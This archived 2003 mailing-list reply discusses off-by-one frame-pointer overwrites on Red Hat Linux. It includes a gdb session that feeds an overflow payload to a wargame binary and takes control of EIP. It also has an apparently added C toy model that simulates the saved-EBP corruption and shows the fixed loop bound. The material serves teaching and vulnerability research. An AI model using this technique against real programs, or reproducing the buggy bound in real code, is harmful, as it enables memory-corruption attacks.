Vulnerability Development mailing list archives

Re: Off By One on Red Hat Linux again


From: DownBload <downbload () hotmail com>
Date: 30 Aug 2003 10:50:09 -0000

In-Reply-To: <20030829144654.29393.qmail () mail supereva it>

TO MODERATOR: Sorry, the previous message had an error; this is the valid message.

hi again,

I tested the frame pointer overwrite vulnerability in Red Hat Linux 7.0 & 7.1
too... but it fails to overwrite the LSB of EBP. These distros have gcc-2.96-54
and gcc-2.96-81; any ideas?

However, a remote off-by-one exploit (rsyncd) worked successfully in Red Hat 7.1,
and I don't understand why a local scenario fails.

I will test the FP overwrite again in other distros (Mandrake & SUSE) and I will
inform you about complete exploitation.

Thanks to Jose Ronnick for the immediate response.

Off-by-one should work on RH 7.0.
I tested it on RH 6.1 with egcs-2.91.66 (2.2.12-20 kernel) and Debian 3.0
with gcc 2.95.4 (2.4.21 kernel). It worked on both.

You can download off-by-one example here:
http://www.ii-labs.org/wargame/levels/level15.c

gdb ./level15
....
....
r `perl -e 'print "A"x250; print "\x4c" x 500'`
...
...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) q

It worked....
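Why a single 0x4c byte past the end of the buffer ends in "0x41414141 in ?? ()" is not spelled out above. The following is an added example, not level15.c and not code from either poster: a toy model of a 32-bit stack in which a vulnerable copy loop (`i <= BUFSZ`, an assumed shape for the bug) writes one byte past a 256-byte buffer, overwriting the least significant byte of the saved EBP. Stepping the two `leave; ret` sequences (the vulnerable function's and then its caller's) shows the corrupted EBP pulling the return address out of the attacker's 'A' bytes. All addresses and the two return addresses are constructed placeholders, and the layout assumes the buffer sits directly below the saved EBP with no padding; a compiler that pads or realigns the frame leaves the stray byte in the padding and the write never reaches EBP, which is the kind of difference between compiler versions that decides whether this technique works.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/*
 * Toy model of a 32-bit stack; nothing here touches the real stack.
 * Assumed layout (constructed addresses, no padding between buf and EBP):
 *
 *   0xbffff7f0  buf[0]                        (BUFSZ = 256 bytes)
 *   0xbffff8f0  saved EBP of vuln()'s caller  <- vuln()'s EBP
 *   0xbffff8f4  return address into main()
 *   0xbffff8f8  saved EBP of main()'s caller  <- main()'s EBP
 *   0xbffff8fc  return address out of main()
 */
#define STACK_BASE    0xbffff000u
#define STACK_SIZE    0x1000u
#define BUFSZ         256u
#define VULN_EBP      0xbffff8f0u
#define BUF_ADDR      (VULN_EBP - BUFSZ)
#define MAIN_EBP      0xbffff8f8u
#define RET_TO_MAIN   0x08048500u   /* placeholder text addresses */
#define RET_FROM_MAIN 0x08048600u

static uint8_t stack[STACK_SIZE];

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, &stack[a - STACK_BASE], 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(&stack[a - STACK_BASE], &v, 4); }

/* Lay down the two frames exactly as the prologues of main() and vuln() would. */
static void build_frames(void) {
    memset(stack, 0, sizeof stack);
    wr32(VULN_EBP,     MAIN_EBP);      /* vuln()'s saved EBP: the byte we hit */
    wr32(VULN_EBP + 4, RET_TO_MAIN);
    wr32(MAIN_EBP,     0xbffff9c0u);   /* main()'s saved EBP, arbitrary */
    wr32(MAIN_EBP + 4, RET_FROM_MAIN);
}

/* Vulnerable copy: `i <= BUFSZ` writes BUFSZ+1 bytes, one past the buffer. */
static void copy_off_by_one(const uint8_t *src, size_t len) {
    size_t i;
    for (i = 0; i <= BUFSZ && i < len; i++)
        stack[BUF_ADDR - STACK_BASE + i] = src[i];
}

/* Hardened copy: `i < BUFSZ` never leaves the buffer. */
static void copy_fixed(const uint8_t *src, size_t len) {
    size_t i;
    for (i = 0; i < BUFSZ && i < len; i++)
        stack[BUF_ADDR - STACK_BASE + i] = src[i];
}

/* One `leave; ret`: mov esp,ebp / pop ebp / ret. Returns the new EIP. */
static uint32_t leave_ret(uint32_t *ebp, uint32_t *esp) {
    uint32_t eip;
    *esp = *ebp;
    *ebp = rd32(*esp);
    *esp += 4;
    eip = rd32(*esp);
    *esp += 4;
    return eip;
}

/* Copy the payload into vuln()'s buffer, return from vuln(), then from main(). */
uint32_t run(const uint8_t *payload, size_t len, int fixed) {
    uint32_t ebp = VULN_EBP, esp = 0, eip;
    build_frames();
    if (fixed) copy_fixed(payload, len); else copy_off_by_one(payload, len);
    eip = leave_ret(&ebp, &esp);   /* vuln() returns; EBP's low byte may be 0x4c now */
    if (eip != RET_TO_MAIN) return eip;
    return leave_ret(&ebp, &esp);  /* main() returns through the corrupted EBP */
}

/* Payload shaped like the gdb session above: 250 'A' then 0x4c bytes. */
size_t build_payload(uint8_t *out, size_t cap) {
    size_t i;
    for (i = 0; i < cap; i++) out[i] = (i < 250) ? 'A' : 0x4c;
    return cap;
}

/* Convenience: final EIP for that payload, vulnerable (0) or fixed (1) copy. */
uint32_t run_gdb_payload(int fixed) {
    uint8_t payload[750];
    size_t n = build_payload(payload, sizeof payload);
    return run(payload, n, fixed);
}

int main(void) {
    printf("off-by-one: eip = 0x%08x\n", run_gdb_payload(0));
    printf("fixed:      eip = 0x%08x\n", run_gdb_payload(1));
    return 0;
}
```

Walking through it: the 257th byte written is payload[256] = 0x4c, which lands on the low byte of vuln()'s saved EBP (little-endian, so the low byte sits at the lowest address), turning 0xbffff8f8 into 0xbffff84c, an address inside the buffer. vuln()'s own return is unaffected and lands in main(), but main()'s `leave` then sets ESP to 0xbffff84c, its `pop ebp` and `ret` read from buffer offsets 92 and 96, and EIP becomes 0x41414141. With the `<` bound the saved EBP survives and the model returns to the placeholder 0x08048600 instead.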

